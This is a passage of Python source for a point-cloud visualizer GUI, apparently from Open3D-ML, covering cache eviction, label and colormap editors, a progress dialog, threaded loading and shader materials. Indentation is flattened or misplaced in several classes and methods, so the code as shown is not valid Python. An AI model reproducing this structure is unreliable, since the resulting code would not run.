        size = self._calc_pointcloud_size(self._data[name], self.tclouds[name])
        if size + self._current_memory_usage > self._memory_limit:
            if fail_if_no_space:
                self.unload(name)
                return False
            else:
                # Remove oldest from cache
                remove_name = self._cached_data.popleft()
                remove_size = self._calc_pointcloud_size(
                    self._data[remove_name], self.tclouds[remove_name])
                self._current_memory_usage -= remove_size
                self.unload(remove_name)
                # Add new point cloud to cache
                self._cached_data.append(name)
                self._current_memory_usage += size
                return True
        else:
            self._current_memory_usage += size
            self._cached_data.append(name)
            return True

    def _calc_pointcloud_size(self, raw_data, pcloud):
        """Estimate the size in bytes of the pointcloud based on the rawdata."""
        pcloud_size = 0
        # Assumes 4 bytes per element for the raw attribute arrays.
        for (attr, arr) in raw_data.items():
            pcloud_size += arr.size * 4
        # Point cloud consumes 64 bytes of per point of GPU memory
        pcloud_size += pcloud.point["points"].num_elements() * 64
        return pcloud_size

    def unload(self, name):
        """Unload the data (if it was loaded earlier)."""
        # Only unload if this was loadable; we might have an in-memory,
        # user-specified data created directly through create_point_cloud().
        if name in self._name2datasetidx:
            # Replace with an empty cloud rather than deleting the entry, so
            # the name stays known to the tree/UI.
            tcloud = o3d.t.geometry.PointCloud(o3d.core.Device("CPU:0"))
            self.tclouds[name] = tcloud
            self._data[name] = {}

            bbox_name = Model.bounding_box_prefix + name
            for i in range(0, len(self.bounding_box_data)):
                if self.bounding_box_data[i].name == bbox_name:
                    self.bounding_box_data.pop(i)
                    break
class Visualizer:
"""The visualizer class for dataset objects and custom point clouds."""
    class LabelLUTEdit:
        """This class includes functionality for managing a labellut (label look-up-table)."""

        def __init__(self):
            self.widget = gui.TreeView()
            self._on_changed = None  # takes no args, returns no value
            self.clear()

        def clear(self):
            """Clears the look-up table."""
            self.widget.clear()
            self._label2color = {}  # label key -> [r, g, b, a]

        def is_empty(self):
            """Checks if the look-up table is empty."""
            return len(self._label2color) == 0

        def get_colors(self):
            """Returns the RGBA colors, ordered by sorted label key."""
            return [
                self._label2color[label]
                for label in sorted(self._label2color.keys())
            ]

        def set_on_changed(self, callback):  # takes no args, no return value
            self._on_changed = callback

        def set_labels(self, labellut):
            """Updates the labels based on look-up table passsed.

            Rebuilds the tree with one checkable, color-editable row per label.
            """
            self.widget.clear()
            root = self.widget.get_root_item()
            for key in sorted(labellut.labels.keys()):
                lbl = labellut.labels[key]
                color = lbl.color
                # Pad RGB to RGBA; alpha doubles as the "visible" flag below.
                if len(color) == 3:
                    color += [1.0]
                self._label2color[key] = color
                color = gui.Color(lbl.color[0], lbl.color[1], lbl.color[2])
                cell = gui.LUTTreeCell(
                    str(key) + ": " + lbl.name, True, color, None, None)
                cell.checkbox.set_on_checked(
                    self._make_on_checked(key, self._on_label_checked))
                cell.color_edit.set_on_value_changed(
                    self._make_on_color_changed(key,
                                                self._on_label_color_changed))
                self.widget.add_item(root, cell)

        def _make_on_color_changed(self, label, member_func):
            # Factory binds `label` now, so each row's callback keeps its key.
            def on_changed(color):
                member_func(label, color)

            return on_changed

        def _on_label_color_changed(self, label, gui_color):
            # Keep the existing alpha (visibility); replace only RGB.
            self._label2color[label] = [
                gui_color.red, gui_color.green, gui_color.blue,
                self._label2color[label][3]
            ]
            if self._on_changed is not None:
                self._on_changed()

        def _make_on_checked(self, label, member_func):
            # Factory binds `label` now, so each row's callback keeps its key.
            def on_checked(checked):
                member_func(label, checked)

            return on_checked

        def _on_label_checked(self, label, checked):
            # Visibility is encoded in the alpha channel: 1.0 show, 0.0 hide.
            if checked:
                alpha = 1.0
            else:
                alpha = 0.0
            color = self._label2color[label]
            self._label2color[label] = [color[0], color[1], color[2], alpha]
            if self._on_changed is not None:
                self._on_changed()
    class ColormapEdit:
        """This class is used to create a color map for visualization of points.

        Colormap points are stored with values normalized to [0, 1]; the UI
        shows them mapped to the [_min_value, _max_value] data range.
        """

        def __init__(self, window, em):
            self.colormap = None
            self.widget = gui.Vert()
            self._window = window
            self._min_value = 0.0
            self._max_value = 1.0
            self._on_changed = None  # takes no args, no return value
            self._itemid2idx = {}  # tree item id -> index into colormap.points

            self._min_label = gui.Label("")
            self._max_label = gui.Label("")
            grid = gui.VGrid(2)
            grid.add_child(gui.Label("Range (min):"))
            grid.add_child(self._min_label)
            grid.add_child(gui.Label("Range (max):"))
            grid.add_child(self._max_label)
            self.widget.add_child(grid)
            self.widget.add_fixed(0.5 * em)
            self.widget.add_child(gui.Label("Colormap"))
            self._edit = gui.TreeView()
            self._edit.set_on_selection_changed(self._on_selection_changed)
            self.widget.add_child(self._edit)

            self._delete = gui.Button("Delete")
            self._delete.horizontal_padding_em = 0.5
            self._delete.vertical_padding_em = 0
            self._delete.set_on_clicked(self._on_delete)
            self._add = gui.Button("Add")
            self._add.horizontal_padding_em = 0.5
            self._add.vertical_padding_em = 0
            self._add.set_on_clicked(self._on_add)
            h = gui.Horiz()
            h.add_stretch()
            h.add_child(self._delete)
            h.add_fixed(0.25 * em)
            h.add_child(self._add)
            h.add_stretch()
            self.widget.add_fixed(0.5 * em)
            self.widget.add_child(h)
            self.widget.add_fixed(0.5 * em)

        def set_on_changed(self, callback):  # takes no args, no return value
            self._on_changed = callback

        def update(self, colormap, min_val, max_val):
            """Updates the colormap based on the minimum and maximum values passed."""
            self.colormap = colormap
            self._min_value = min_val
            self._max_value = max_val
            self._min_label.text = str(min_val)
            self._max_label.text = str(max_val)

            # Guard against a degenerate (empty) range.
            if self._min_value >= self._max_value:
                self._max_value = self._min_value + 1.0

            self._edit.clear()
            self._itemid2idx = {}

            root_id = self._edit.get_root_item()
            for i in range(0, len(self.colormap.points)):
                p = self.colormap.points[i]
                color = gui.Color(p.color[0], p.color[1], p.color[2])
                # Map the normalized point value into the data range for display.
                val = min_val + p.value * (max_val - min_val)
                cell = gui.ColormapTreeCell(val, color, None, None)
                cell.color_edit.set_on_value_changed(
                    self._make_on_color_changed(i, self._on_color_changed))
                cell.number_edit.set_on_value_changed(
                    self._make_on_value_changed(i, self._on_value_changed))
                item_id = self._edit.add_item(root_id, cell)
                self._itemid2idx[item_id] = i
            self._update_buttons_enabled()

        def _make_on_color_changed(self, idx, member_func):
            # Factory binds `idx` now, so each row's callback keeps its index.
            def on_changed(color):
                member_func(idx, color)

            return on_changed

        def _on_color_changed(self, idx, gui_color):
            self.colormap.points[idx].color = [
                gui_color.red, gui_color.green, gui_color.blue
            ]
            if self._on_changed is not None:
                self._on_changed()

        def _make_on_value_changed(self, idx, member_func):
            # Factory binds `idx` now, so each row's callback keeps its index.
            def on_changed(value):
                member_func(idx, value)

            return on_changed

        def _on_value_changed(self, idx, value):
            # Normalize the edited display value back to [0, 1].
            value = (value - self._min_value) / (self._max_value -
                                                 self._min_value)
            needs_update = False
            value = min(1.0, max(0.0, value))

            # If the edit moved this point past a neighbor, re-sort the points
            # and track where this point landed.
            if ((idx > 0 and value < self.colormap.points[idx - 1].value) or
                    (idx < len(self.colormap.points) - 1 and
                     value > self.colormap.points[idx + 1].value)):
                self.colormap.points[idx].value = value
                o = self.colormap.points[idx]
                self.colormap.points.sort(key=lambda cmap_pt: cmap_pt.value)
                for i in range(0, len(self.colormap.points)):
                    if self.colormap.points[i] is o:
                        idx = i
                        break
                needs_update = True

            # Nudge the value off an exact tie with the previous point.
            if idx > 0 and value == self.colormap.points[idx - 1].value:
                if idx < len(self.colormap.points):
                    upper = self.colormap.points[idx + 1].value
                else:
                    upper = 1.0
                value = value + 0.5 * (upper - value)
                needs_update = True

            # Nudge the value off an exact tie with the next point.
            if idx < len(self.colormap.points
                        ) - 1 and value == self.colormap.points[idx + 1].value:
                if idx > 0:
                    lower = self.colormap.points[idx - 1].value
                else:
                    lower = 0.0
                value = lower + 0.5 * (value - lower)
                needs_update = True

            self.colormap.points[idx].value = value

            if needs_update:
                self._update_later()

            if self._on_changed is not None:
                self._on_changed()

        def _on_selection_changed(self, item_id):
            self._update_buttons_enabled()

        def _on_delete(self):
            # A colormap needs at least two points, so never delete below that.
            if len(self.colormap.points) > 2:
                idx = self._itemid2idx[self._edit.selected_item]
                self.colormap.points = self.colormap.points[:
                                                            idx] + self.colormap.points[
                                                                idx + 1:]
                del self._itemid2idx[self._edit.selected_item]
                self._update_later()
                if self._on_changed is not None:
                    self._on_changed()

        def _on_add(self):
            if self._edit.selected_item in self._itemid2idx:  # maybe no selection
                idx = self._itemid2idx[self._edit.selected_item]
                # Insert midway between the selected point and its neighbor.
                if idx < len(self.colormap.points) - 1:
                    lower = self.colormap.points[idx]
                    upper = self.colormap.points[idx + 1]
                else:
                    lower = self.colormap.points[len(self.colormap.points) - 2]
                    upper = self.colormap.points[len(self.colormap.points) - 1]
                add_idx = min(idx + 1, len(self.colormap.points) - 1)
                new_value = lower.value + 0.5 * (upper.value - lower.value)
                new_color = [
                    0.5 * lower.color[0] + 0.5 * upper.color[0],
                    0.5 * lower.color[1] + 0.5 * upper.color[1],
                    0.5 * lower.color[2] + 0.5 * upper.color[2]
                ]
                new_point = Colormap.Point(new_value, new_color)
                self.colormap.points = self.colormap.points[:add_idx] + [
                    new_point
                ] + self.colormap.points[add_idx:]
                self._update_later()
                if self._on_changed is not None:
                    self._on_changed()

        def _update_buttons_enabled(self):
            if self._edit.selected_item in self._itemid2idx:
                self._delete.enabled = len(self.colormap.points) > 2
                self._add.enabled = True
            else:
                self._delete.enabled = False
                self._add.enabled = False

        def _update_later(self):
            # Rebuilding the tree during a callback is unsafe; defer to the
            # main thread's next tick.
            def update():
                self.update(self.colormap, self._min_value, self._max_value)
                self._window.post_redraw()  # need to manually request redraw

            gui.Application.instance.post_to_main_thread(self._window, update)
class ProgressDialog:
"""
This class is used to manage the progress dialog displayed during visualization.
Args:
title: The title of the dialog box.
window: The window where the progress dialog box should be displayed.
n_items: The maximum number of items.
"""
def __init__(self, title, window, n_items):
self._window = window
self._n_items = n_items
em = window.theme.font_size
self.dialog = gui.Dialog(title)
self._label = gui.Label(title + " ")
self._layout = gui.Vert(0, gui.Margins(em, em, em, em))
self.dialog.add_child(self._layout)
self._layout.add_child(self._label)
self._layout.add_fixed(0.5 * em)
self._progress = gui.ProgressBar()
self._progress.value = 0.0
self._layout.add_child(self._progress)
def set_text(self, text):
"""Set the label text on the dialog box."""
self._label.text = text + " "
def post_update(self, text=None):
"""Post updates to the main thread."""
if text is None:
gui.Application.instance.post_to_main_thread(
self._window, self.update)
else:
def update_with_text():
self.update()
self._label.text = text
gui.Application.instance.post_to_main_thread(
self._window, update_with_text)
def update(self):
"""Enumerate the progress in the dialog box."""
value = min(1.0, self._progress.value + 1.0 / self._n_items)
self._progress.value = value
SOLID_NAME = "Solid Color"
LABELS_NAME = "Label Colormap"
RAINBOW_NAME = "Colormap (Rainbow)"
GREYSCALE_NAME = "Colormap (Greyscale)"
COLOR_NAME = "RGB"
X_ATTR_NAME = "x position"
Y_ATTR_NAME = "y position"
Z_ATTR_NAME = "z position"
    def __init__(self):
        self._objects = None  # the backing Model (DataModel or DatasetModel)
        self._name2treenode = {}  # tree path -> tree cell widget
        self._name2treeid = {}  # parent tree path -> tree item id
        self._treeid2name = {}  # tree item id -> tree path
        self._attrname2lut = {}  # attribute name -> LabelLUT
        self._colormaps = {}  # shader name -> Colormap
        self._shadername2panelidx = {}  # shader name -> StackedWidget index
        self._gradient = rendering.Gradient()
        self._scalar_min = 0.0
        self._scalar_max = 1.0
        self._animation_frames = []
        self._last_animation_time = time.time()
        self._animation_delay_secs = 0.100  # delay between animation frames
        self._consolidate_bounding_boxes = False
        # When True, _update_point_cloud() returns immediately (used to batch
        # UI changes without re-uploading geometry each time).
        self._dont_update_geometry = False
    def _init_dataset(self, dataset, split, indices):
        """Create the backing model from a 3D ML dataset split."""
        self._objects = DatasetModel(dataset, split, indices)
    def _init_data(self, data):
        """Create the backing model from user-supplied point cloud dicts."""
        self._objects = DataModel(data)
    def _init_user_interface(self, title, width, height):
        """Build the window: 3D scene plus the controls side panel.

        The panel has three sections: mouse controls, dataset (tree/animation
        tabs), and properties (data source, shader, and per-shader sub-panels).
        """
        self.window = gui.Application.instance.create_window(
            title, width, height)
        self.window.set_on_layout(self._on_layout)

        em = self.window.theme.font_size

        self._3d = gui.SceneWidget()
        self._3d.enable_scene_caching(True)  # makes UI _much_ more responsive
        self._3d.scene = rendering.Open3DScene(self.window.renderer)
        self.window.add_child(self._3d)

        self._panel = gui.Vert()
        self.window.add_child(self._panel)

        indented_margins = gui.Margins(em, 0, em, 0)

        # View controls
        ctrl = gui.CollapsableVert("Mouse Controls", 0, indented_margins)

        arcball = gui.Button("Arcball")
        arcball.set_on_clicked(self._on_arcball_mode)
        arcball.horizontal_padding_em = 0.5
        arcball.vertical_padding_em = 0
        fly = gui.Button("Fly")
        fly.set_on_clicked(self._on_fly_mode)
        fly.horizontal_padding_em = 0.5
        fly.vertical_padding_em = 0
        reset = gui.Button("Re-center")
        reset.set_on_clicked(self._on_reset_camera)
        reset.horizontal_padding_em = 0.5
        reset.vertical_padding_em = 0
        h = gui.Horiz(0.25 * em)
        h.add_stretch()
        h.add_child(arcball)
        h.add_child(fly)
        h.add_fixed(em)
        h.add_child(reset)
        h.add_stretch()
        ctrl.add_child(h)
        ctrl.add_fixed(em)
        self._panel.add_child(ctrl)

        # Dataset
        model = gui.CollapsableVert("Dataset", 0, indented_margins)

        vgrid = gui.VGrid(2, 0.25 * em)
        model.add_child(vgrid)
        model.add_fixed(0.5 * em)

        bgcolor = gui.ColorEdit()
        bgcolor.color_value = gui.Color(1, 1, 1)
        self._on_bgcolor_changed(bgcolor.color_value)
        bgcolor.set_on_value_changed(self._on_bgcolor_changed)
        vgrid.add_child(gui.Label("BG Color"))
        vgrid.add_child(bgcolor)

        view_tab = gui.TabControl()
        view_tab.set_on_selected_tab_changed(self._on_display_tab_changed)
        model.add_child(view_tab)

        # ... model list
        self._dataset = gui.TreeView()
        self._dataset.set_on_selection_changed(
            self._on_dataset_selection_changed)
        view_tab.add_tab("List", self._dataset)

        # ... animation slider
        v = gui.Vert()
        view_tab.add_tab("Animation", v)
        v.add_fixed(0.25 * em)
        grid = gui.VGrid(2)
        v.add_child(grid)

        self._slider = gui.Slider(gui.Slider.INT)
        self._slider.set_limits(0, len(self._objects.data_names))
        self._slider.set_on_value_changed(self._on_animation_slider_changed)
        grid.add_child(gui.Label("Index"))
        grid.add_child(self._slider)

        self._slider_current = gui.Label("")
        grid.add_child(gui.Label("Showing"))
        grid.add_child(self._slider_current)

        v.add_fixed(em)

        self._play = gui.Button("Play")
        self._play.horizontal_padding_em = 0.5
        self._play.vertical_padding_em = 0
        self._play.set_on_clicked(self._on_start_animation)
        h = gui.Horiz()
        h.add_stretch()
        h.add_child(self._play)
        h.add_stretch()
        v.add_child(h)

        self._panel.add_child(model)

        # Coloring
        properties = gui.CollapsableVert("Properties", 0, indented_margins)

        grid = gui.VGrid(2, 0.25 * em)

        # ... data source
        self._datasource_combobox = gui.Combobox()
        self._datasource_combobox.set_on_selection_changed(
            self._on_datasource_changed)
        self._colormap_channel = gui.Combobox()
        self._colormap_channel.add_item("0")
        self._colormap_channel.set_on_selection_changed(
            self._on_channel_changed)
        h = gui.Horiz()
        h.add_child(self._datasource_combobox)
        h.add_fixed(em)
        h.add_child(gui.Label("Index"))
        h.add_child(self._colormap_channel)
        grid.add_child(gui.Label("Data"))
        grid.add_child(h)

        # ... shader
        self._shader = gui.Combobox()
        self._shader.add_item(self.SOLID_NAME)
        self._shader.add_item(self.LABELS_NAME)
        self._shader.add_item(self.RAINBOW_NAME)
        self._shader.add_item(self.GREYSCALE_NAME)
        self._shader.add_item(self.COLOR_NAME)
        self._colormaps[self.RAINBOW_NAME] = Colormap.make_rainbow()
        self._colormaps[self.GREYSCALE_NAME] = Colormap.make_greyscale()
        self._shader.selected_index = 0
        self._shader.set_on_selection_changed(self._on_shader_changed)
        grid.add_child(gui.Label("Shader"))
        grid.add_child(self._shader)

        properties.add_child(grid)

        # ... shader panels: one sub-panel per shader, shown via StackedWidget
        self._shader_panels = gui.StackedWidget()
        panel_idx = 0

        # ... sub-panel: single color
        self._color_panel = gui.Vert()
        self._shader_panels.add_child(self._color_panel)
        self._shadername2panelidx[self.SOLID_NAME] = panel_idx
        panel_idx += 1
        self._color = gui.ColorEdit()
        self._color.color_value = gui.Color(0.5, 0.5, 0.5)
        self._color.set_on_value_changed(self._on_shader_color_changed)
        h = gui.Horiz()
        h.add_child(gui.Label("Color"))
        h.add_child(self._color)
        self._color_panel.add_child(h)

        # ... sub-panel: labels
        self._labels_panel = gui.Vert()
        self._shader_panels.add_child(self._labels_panel)
        self._shadername2panelidx[self.LABELS_NAME] = panel_idx
        panel_idx += 1
        self._label_edit = self.LabelLUTEdit()
        self._label_edit.set_on_changed(self._on_labels_changed)
        self._labels_panel.add_child(gui.Label("Labels"))
        self._labels_panel.add_child(self._label_edit.widget)

        # ... sub-panel: colormap (shared by rainbow and greyscale)
        self._colormap_panel = gui.Vert()
        self._shader_panels.add_child(self._colormap_panel)
        self._shadername2panelidx[self.RAINBOW_NAME] = panel_idx
        self._shadername2panelidx[self.GREYSCALE_NAME] = panel_idx
        panel_idx += 1
        self._colormap_edit = self.ColormapEdit(self.window, em)
        self._colormap_edit.set_on_changed(self._on_colormap_changed)
        self._colormap_panel.add_child(self._colormap_edit.widget)

        # ... sub-panel: RGB
        self._rgb_panel = gui.Vert()
        self._shader_panels.add_child(self._rgb_panel)
        self._shadername2panelidx[self.COLOR_NAME] = panel_idx
        panel_idx += 1
        self._rgb_combo = gui.Combobox()
        self._rgb_combo.add_item("255")
        self._rgb_combo.add_item("1.0")
        self._rgb_combo.set_on_selection_changed(self._on_rgb_multiplier)
        h = gui.Horiz(0.5 * em)
        h.add_child(gui.Label("Max value"))
        h.add_child(self._rgb_combo)
        self._rgb_panel.add_child(h)

        properties.add_fixed(em)
        properties.add_child(self._shader_panels)
        self._panel.add_child(properties)

        # Populate tree, etc.
        for name in self._objects.data_names:
            self._add_tree_name(name)

        self._update_datasource_combobox()
    def set_lut(self, attr_name, lut):
        """Set the LUT for a specific attribute.

        Args:
            attr_name: The attribute name as string.
            lut: The LabelLUT object that should be updated.
        """
        self._attrname2lut[attr_name] = lut
def setup_camera(self):
"""Set up camera for visualization."""
selected_names = self._get_selected_names()
selected_bounds = [
self._objects.calc_bounds_for(n) for n in selected_names
]
min_val = [1e30, 1e30, 1e30]
max_val = [-1e30, -1e30, -1e30]
for b in selected_bounds:
for i in range(0, 3):
min_val[i] = min(min_val[i], b[0][i])
max_val[i] = max(max_val[i], b[1][i])
bounds = o3d.geometry.AxisAlignedBoundingBox(min_val, max_val)
self._3d.setup_camera(60, bounds, bounds.get_center())
def show_geometries_under(self, name, show):
"""Show geometry for a given node."""
prefix = name
for (n, node) in self._name2treenode.items():
if n.startswith(prefix):
self._3d.scene.show_geometry(n, show)
node.checkbox.checked = show
self._3d.force_redraw()
def _add_tree_name(self, name, is_geometry=True):
names = name.split("/")
parent = self._dataset.get_root_item()
for i in range(0, len(names) - 1):
n = "/".join(names[:i + 1]) + "/"
if n in self._name2treeid:
parent = self._name2treeid[n]
else:
def on_parent_checked(checked):
self.show_geometries_under(n, checked)
cell = gui.CheckableTextTreeCell(n, True, on_parent_checked)
parent = self._dataset.add_item(parent, cell)
self._name2treenode[n] = cell
self._name2treeid[n] = parent
self._treeid2name[parent] = n
def on_checked(checked):
self._3d.scene.show_geometry(name, checked)
if self._is_tree_name_geometry(name):
# available attrs could change
self._update_datasource_combobox()
self._update_bounding_boxes()
self._3d.force_redraw()
cell = gui.CheckableTextTreeCell(names[-1], True, on_checked)
if is_geometry:
cell.label.text_color = gui.Color(1.0, 0.0, 0.0, 1.0)
node = self._dataset.add_item(parent, cell)
self._name2treenode[name] = cell
self._treeid2name[node] = name
self._slider.set_limits(0, len(self._objects.data_names) - 1)
if len(self._objects.data_names) == 1:
self._slider_current.text = name
def _load_geometry(self, name, ui_done_callback):
progress_dlg = Visualizer.ProgressDialog("Loading...", self.window, 2)
progress_dlg.set_text("Loading " + name + "...")
def load_thread():
result = self._objects.load(name)
progress_dlg.post_update("Loading " + name + "...")
gui.Application.instance.post_to_main_thread(
self.window, ui_done_callback)
gui.Application.instance.post_to_main_thread(
self.window, self.window.close_dialog)
self.window.show_dialog(progress_dlg.dialog)
threading.Thread(target=load_thread).start()
    def _load_geometries(self, names, ui_done_callback):
        """Load several geometries on a worker thread behind a progress
        dialog; stops early when a load fails (e.g. out of memory budget)."""
        # Progress has: len(names) items + ui_done_callback
        progress_dlg = Visualizer.ProgressDialog("Loading...", self.window,
                                                 len(names) + 1)
        progress_dlg.set_text("Loading " + names[0] + "...")

        def load_thread():
            for i in range(0, len(names)):
                # fail_if_no_space=True: do not evict other clouds here.
                result = self._objects.load(names[i], True)
                if i + 1 < len(names):
                    text = "Loading " + names[i + 1] + "..."
                else:
                    text = "Creating GPU objects..."
                progress_dlg.post_update(text)
                if result:
                    # Green label marks a successfully loaded cloud.
                    self._name2treenode[names[i]].label.text_color = gui.Color(
                        0.0, 1.0, 0.0, 1.0)
                else:
                    break

            gui.Application.instance.post_to_main_thread(
                self.window, ui_done_callback)
            gui.Application.instance.post_to_main_thread(
                self.window, self.window.close_dialog)

        self.window.show_dialog(progress_dlg.dialog)
        threading.Thread(target=load_thread).start()
    def _update_geometry(self, check_unloaded=False):
        """Re-push all point clouds and the current material to the scene.

        Args:
            check_unloaded: When True, first remove scene geometry for clouds
                the model has unloaded.
        """
        if check_unloaded:
            for name in self._objects.data_names:
                if not self._objects.is_loaded(name):
                    self._3d.scene.remove_geometry(name)

        material = self._get_material()
        for n, tcloud in self._objects.tclouds.items():
            self._update_point_cloud(n, tcloud, material)
            if not tcloud.is_empty():
                # Green label: loaded and present in the scene.
                self._name2treenode[n].label.text_color = gui.Color(
                    0.0, 1.0, 0.0, 1.0)
                if self._3d.scene.has_geometry(n):
                    self._3d.scene.modify_geometry_material(n, material)
            else:
                # Red label: not loaded; also uncheck it in the tree.
                self._name2treenode[n].label.text_color = gui.Color(
                    1.0, 0.0, 0.0, 1.0)
                self._name2treenode[n].checkbox.checked = False
        self._3d.force_redraw()
    def _update_point_cloud(self, name, tcloud, material):
        """Refresh one cloud's scalar/color arrays and (re-)add it to the scene.

        Accumulates Open3D update flags so only the changed arrays are
        re-uploaded when the geometry already exists in the scene.
        """
        if self._dont_update_geometry:
            return

        if tcloud.is_empty():
            return

        attr_name = self._datasource_combobox.selected_text
        attr = None
        flag = 0
        attr = self._objects.get_attr(name, attr_name)

        # Update scalar values
        if attr is not None:
            if len(attr.shape) == 1:
                scalar = attr
            else:
                channel = max(0, self._colormap_channel.selected_index)
                scalar = attr[:, channel]
        else:
            # No such attribute on this cloud: use all-zero scalars.
            shape = [len(tcloud.point["points"].numpy())]
            scalar = np.zeros(shape, dtype='float32')
        tcloud.point["__visualization_scalar"] = Visualizer._make_tcloud_array(
            scalar)
        flag |= rendering.Scene.UPDATE_UV0_FLAG

        # Update RGB values
        if attr is not None and (len(attr.shape) == 2 and attr.shape[1] >= 3):
            # Normalize by the user-selected max value ("255" or "1.0").
            max_val = float(self._rgb_combo.selected_text)
            if max_val <= 0:
                max_val = 255.0
            colors = attr[:, [0, 1, 2]] * (1.0 / max_val)
            tcloud.point["colors"] = Visualizer._make_tcloud_array(colors)
            flag |= rendering.Scene.UPDATE_COLORS_FLAG

        # Update geometry
        if self._3d.scene.scene.has_geometry(name):
            self._3d.scene.scene.update_geometry(name, tcloud, flag)
        else:
            self._3d.scene.add_geometry(name, tcloud, material)

        # Keep scene visibility in sync with the tree checkbox.
        node = self._name2treenode[name]
        if node is not None:
            self._3d.scene.show_geometry(name, node.checkbox.checked)
def _get_material(self):
    """Build a rendering material matching the selected shader mode.

    Returns:
        A rendering.Material configured for solid color, per-point RGB,
        or gradient (LUT/colormap) shading.
    """
    self._update_gradient()
    material = rendering.Material()
    if self._shader.selected_text == self.SOLID_NAME:
        # Single uniform color chosen in the color picker.
        material.shader = "unlitSolidColor"
        c = self._color.color_value
        material.base_color = [c.red, c.green, c.blue, 1.0]
    elif self._shader.selected_text == self.COLOR_NAME:
        # Per-point RGB from the data; white base so colors pass through.
        material.shader = "defaultUnlit"
        material.base_color = [1.0, 1.0, 1.0, 1.0]
    else:
        # Scalar attribute mapped through the current gradient.
        material.shader = "unlitGradient"
        material.gradient = self._gradient
        material.scalar_min = self._scalar_min
        material.scalar_max = self._scalar_max
    return material
def _update_bounding_boxes(self, animation_frame=None):
    """Draw the bounding boxes for the checked (or animated) geometries.

    Args:
        animation_frame: when not None, only boxes belonging to that
            animation frame's geometry are shown; otherwise boxes of all
            checked geometries are shown.
    """
    # Pick a label LUT for coloring the boxes, preferring an attribute
    # literally named "labels"/"label"; None means default coloring.
    if len(self._attrname2lut) == 1:
        # (fix) the original iterated the dict just to fetch its single
        # value; next(iter(...)) is the direct idiom.
        lut = next(iter(self._attrname2lut.values()))
    elif "labels" in self._attrname2lut:
        lut = self._attrname2lut["labels"]
    elif "label" in self._attrname2lut:
        lut = self._attrname2lut["label"]
    else:
        lut = None

    mat = rendering.Material()
    mat.shader = "unlitLine"
    mat.line_width = 2 * self.window.scaling

    if self._consolidate_bounding_boxes:
        name = Model.bounding_box_prefix.split("/")[0]
        boxes = []
        # When consolidated we assume bbox_data.name is the geometry name.
        if animation_frame is None:
            for bbox_data in self._objects.bounding_box_data:
                if bbox_data.name in self._name2treenode and self._name2treenode[
                        bbox_data.name].checkbox.checked:
                    boxes += bbox_data.boxes
        else:
            geom_name = self._animation_frames[animation_frame]
            for bbox_data in self._objects.bounding_box_data:
                if bbox_data.name == geom_name:
                    boxes = bbox_data.boxes
                    break
        # Rebuild the single consolidated line set from scratch.
        self._3d.scene.remove_geometry(name)
        if len(boxes) > 0:
            lines = BoundingBox3D.create_lines(boxes, lut)
            self._3d.scene.add_geometry(name, lines, mat)
            if name not in self._name2treenode:
                self._add_tree_name(name, is_geometry=False)
        self._3d.force_redraw()
    else:
        # Don't run this more than once if we aren't consolidating,
        # because nothing will change.
        if len(self._objects.bounding_box_data) > 0:
            if self._objects.bounding_box_data[
                    0].name in self._name2treenode:
                return
        for bbox_data in self._objects.bounding_box_data:
            lines = BoundingBox3D.create_lines(bbox_data.boxes, lut)
            self._3d.scene.add_geometry(bbox_data.name, lines, mat)
        for bbox_data in self._objects.bounding_box_data:
            self._add_tree_name(bbox_data.name, is_geometry=False)
        self._3d.force_redraw()
def _update_gradient(self):
    """Rebuild self._gradient from the label LUT or the active colormap."""
    if self._shader.selected_text == self.LABELS_NAME:
        # Discrete per-label colors: spread them evenly over [0, 1] and
        # use LUT mode so values snap to the nearest point.
        colors = self._label_edit.get_colors()
        n = float(len(colors) - 1)
        if n >= 1:
            self._gradient.points = [
                rendering.Gradient.Point(
                    float(i) / n, [
                        colors[i][0], colors[i][1], colors[i][2],
                        colors[i][3]
                    ]) for i in range(0, len(colors))
            ]
        else:
            # Fewer than two labels: fall back to a single magenta point.
            self._gradient.points = [
                rendering.Gradient.Point(0.0, [1.0, 0.0, 1.0, 1.0])
            ]
        self._gradient.mode = rendering.Gradient.LUT
    else:
        # Continuous colormap (e.g. rainbow/greyscale): interpolate.
        cmap = self._colormaps.get(self._shader.selected_text)
        if cmap is not None:
            self._gradient.points = [
                rendering.Gradient.Point(
                    p.value, [p.color[0], p.color[1], p.color[2], 1.0])
                for p in cmap.points
            ]
        self._gradient.mode = rendering.Gradient.GRADIENT
def _update_geometry_colors(self):
    """Re-apply the current material to every loaded, non-empty cloud."""
    material = self._get_material()
    for geom_name, cloud in self._objects.tclouds.items():
        # Skip clouds that are empty or not yet added to the scene.
        if cloud.is_empty():
            continue
        if not self._3d.scene.has_geometry(geom_name):
            continue
        self._3d.scene.modify_geometry_material(geom_name, material)
    self._3d.force_redraw()
def _update_datasource_combobox(self):
    """Refill the attribute combobox from the currently selected clouds.

    Keeps the previous selection when still available; otherwise selects
    the first attribute, or switches to solid shading if geometries are
    checked but expose no attributes at all.
    """
    current = self._datasource_combobox.selected_text
    self._datasource_combobox.clear_items()
    available_attrs = self._get_available_attrs()
    for attr_name in available_attrs:
        self._datasource_combobox.add_item(attr_name)
    if current in available_attrs:
        self._datasource_combobox.selected_text = current
    elif len(available_attrs) > 0:
        self._datasource_combobox.selected_text = available_attrs[0]
    else:
        # If no attributes, two possibilities:
        # 1) no geometries are selected: don't change anything
        # 2) geometries are selected: color solid
        has_checked = False
        for n, node in self._name2treenode.items():
            if node.checkbox.checked and self._is_tree_name_geometry(n):
                has_checked = True
                break
        if has_checked:
            self._set_shader(self.SOLID_NAME)
def _update_shaders_combobox(self):
    """Rebuild the shader list to match the selected attribute's shape/LUT.

    Vector attributes get the RGB shader option; attributes with a label
    LUT get the labels shader. Re-selects the labels shader if it was
    active and still valid, otherwise defaults scalars to rainbow.
    """
    current_attr = self._datasource_combobox.selected_text
    current_shader = self._shader.selected_text
    has_lut = (current_attr in self._attrname2lut)
    # An attribute is treated as scalar unless the first selected object
    # reports a multi-dimensional shape for it.
    is_scalar = True
    selected_names = self._get_selected_names()
    if len(selected_names) > 0 and len(
            self._objects.get_attr_shape(selected_names[0],
                                         current_attr)) > 1:
        is_scalar = False
    self._shader.clear_items()
    if not is_scalar:
        self._shader.add_item(self.COLOR_NAME)
    if has_lut:
        self._shader.add_item(self.LABELS_NAME)
        self._label_edit.set_labels(self._attrname2lut[current_attr])
    self._shader.add_item(self.RAINBOW_NAME)
    self._shader.add_item(self.GREYSCALE_NAME)
    self._shader.add_item(self.SOLID_NAME)
    if current_shader == self.LABELS_NAME and has_lut:
        self._set_shader(self.LABELS_NAME)
    elif is_scalar:
        self._set_shader(self.RAINBOW_NAME)
def _update_attr_range(self):
    """Recompute scalar min/max for the selected attribute + channel and
